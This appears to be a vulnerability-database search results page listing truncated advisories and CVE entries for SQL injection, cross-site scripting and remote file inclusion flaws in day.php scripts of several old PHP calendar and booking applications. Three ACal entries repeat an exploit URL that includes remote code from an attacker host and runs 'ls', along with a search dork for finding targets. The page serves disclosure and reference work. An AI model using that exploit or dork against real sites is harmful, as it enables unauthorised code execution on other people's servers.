14 matches found
PT-2025-7773 · Slims · Slims
Name of the Vulnerable Software and Affected Versions: SLIMS version 9.6.1 Description: The issue allows a remote attacker to escalate privileges via the month parameter in the visitor report day.php component. This is a result of SQL injection in the affected software. Recommendations: For SLIMS...
Horde Multiple Product - day.php timestamp Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/29365/info Horde Kronolith is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the...
ACal <= 2.2.6 (day.php) Remote File Inclusion Vulnerability
No description provided by source. $$ $ Title: ACal 2.2.6 = Remote File Inclusion $ $$ $ URL: http://acalproj.sourceforge.net/ $ $$ $ Dork: intitle:Login to Calendar $ $$ $ Credits: PiNGuX $ $$ $ Greetz : 0o $ $$ Exploit: http://url/calendarpath/embed/day.php?path=http://yourhost/cmd.gif?cmd=ls...
PHPKIT 1.6.x - b-day.php Addon SQL Injection
PHPKIT 1.6.x - b-day.php Addon SQL Injection source: https://www.securityfocus.com/bid/38891/info PHPKIT 'b-day.php' addon is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an...
PHPKIT 1.6.x - 'b-day.php' Addon SQL Injection
source: https://www.securityfocus.com/bid/38891/info PHPKIT 'b-day.php' addon is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, acces...
CVE-2010-0636
Multiple cross-site scripting (XSS) vulnerabilities in WebCalendar 1.2.0, and other versions before 1.2.5, allow remote attackers to inject arbitrary web script or HTML via the (1) tab parameter to users.php and the PATHINFO to (2) day.php, (3) month.php, and (4) week.php. NOTE: some of these details are...
CVE-2008-4620
SQL injection vulnerability in Meeting Room Booking System (MRBS) before 1.4 allows remote attackers to execute arbitrary SQL commands via the area parameter to (1) month.php, and possibly (2) day.php and (3) week.php...
CVE-2008-3565
Multiple cross-site scripting (XSS) vulnerabilities in Meeting Room Booking System (MRBS) 1.2.6 allow remote attackers to inject arbitrary web script or HTML via the area parameter to (1) day.php, (2) week.php, (3) month.php, (4) search.php, (5) report.php, and (6) help.php. NOTE: the provenance of this...
Meeting Room Booking System (MRBS) 1.2.6 - 'day.php' Cross-Site Scripting
source: https://www.securityfocus.com/bid/30531/info MRBS Meeting Room Booking Software is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an...
CVE-2008-2783
Multiple cross-site scripting (XSS) vulnerabilities in Horde Groupware, Groupware Webmail Edition, and Kronolith allow remote attackers to inject arbitrary web script or HTML via the timestamp parameter to (1) week.php, (2) workweek.php, and (3) day.php; and (4) the horde parameter in the PATHINFO to the...
CVE-2006-2261
CVE-2006-2261 affects ACal 2.2.6. The embed/day.php script does not sanitize the path parameter before using it in PHP include(), enabling a remote file inclusion that can allow arbitrary PHP code execution if PHP register_globals is enabled; the exact exploit details are not provided in the docu...
ACal 2.2.6 - 'day.php' Remote File Inclusion
$$ $ Title: ACal 2.2.6 = Remote File Inclusion $ $$ $ URL: http://acalproj.sourceforge.net/ $ $$ $ Dork: intitle:"Login to Calendar" $ $$ $ Credits: PiNGuX $ $$ $ Greetz : 0o $ $$ Exploit: http://url/calendarpath/embed/day.php?path=http://yourhost/cmd.gif?cmd=ls milw0rm.com 2006-05-07...
ACal <= 2.2.6 (day.php) Remote File Inclusion Vulnerability
No description provided by source. $$ $ Title: ACal 2.2.6 = Remote File Inclusion $ $$ $ URL: http://acalproj.sourceforge.net/ $ $$ $ Dork: intitle:"Login to Calendar" $ $$ $ Credits: PiNGuX $ $$ $ Greetz : 0o $ $$ Exploit: http://url/calendarpath/embed/day.php?path=http://yourhost/cmd.gif?cmd=ls...
CVE-2005-2882
Multiple cross-site scripting (XSS) vulnerabilities in phpCommunityCalendar 4.0.3, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via the LocationID parameter to (1) thankyou.php or (2) day.php, font parameter to (3) calDaily.php, (4) calMonthly.php, (5)...